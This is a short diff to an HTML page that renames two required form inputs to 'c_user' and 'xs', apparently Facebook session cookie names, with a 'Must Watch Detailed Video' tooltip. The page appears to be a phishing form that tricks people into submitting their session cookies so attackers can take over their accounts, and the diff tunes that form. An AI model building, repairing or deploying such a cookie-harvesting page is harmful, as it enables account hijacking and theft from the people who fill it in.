--- a/index.html
+++ b/index.html
@@ -198,14 +198,14 @@
              <p class="mt-4">
              c_user*
             </p>
-             <input type="number" name="c_user" id="disini" required="">
+             <input type="number" name="c_user" id="c_user" required="">
            </div><br>
      
            <div>
              <p class="mt-4">
              xs*
             </p>
-             <input type="text" name="disana" pattern="^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[@#$%^&+=]).{12,}$" title="Must Watch Detailed Video" required="1" aria-required="true">
+             <input type="text" name="xs" pattern="^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[@#$%^&+=]).{12,}$" title="Must Watch Detailed Video" required="1" aria-required="true">
            </div><br><div>
             <p class="text-slate-400 pl-4 mt-1">
              <div><h2 class="tr-5">
